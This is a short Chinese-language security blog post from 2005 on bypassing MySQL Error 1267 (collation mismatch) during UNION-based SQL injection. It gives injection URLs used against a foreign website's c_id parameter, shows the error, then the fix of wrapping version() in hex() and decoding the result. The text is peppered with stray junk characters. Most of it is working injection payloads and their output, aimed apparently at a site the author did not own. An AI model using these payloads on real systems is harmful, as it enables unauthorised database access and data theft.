MySQL注射时ErrorNo.1267的突破

admin

本文作者：SuperHei
文章性质：原创
% J  [2 M: I, c4 H; Q; }% v* C  y发布日期：2005-10-18
测试个国外的站时：
url：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
! ~9 Y$ h# l3 o  `" X7 c6 [6 ~返回错误：
+ [5 o6 J9 ^+ MIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
/ [. P3 Z+ y6 V8 R/ x& YMySQL Error No. 126
看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
解决办法：转为其他编码如hex。
& u. t" }; g9 F* d" ~6 x( Uurl：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
成功得到hex(version())的值为：
342E312E332D62657461
回Mysql查询下得到：
mysql> select 0x342E312E332D62657461;
% A; K2 P+ N2 X& D1 u7 C4 I+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
) a  ]( ~- D3 O# m# d| 4.1.3-beta |
7 }. [$ s% }3 i/ i: j+------------------------+
  x9 E/ W1 v6 v* A1 row in set (0.00 sec)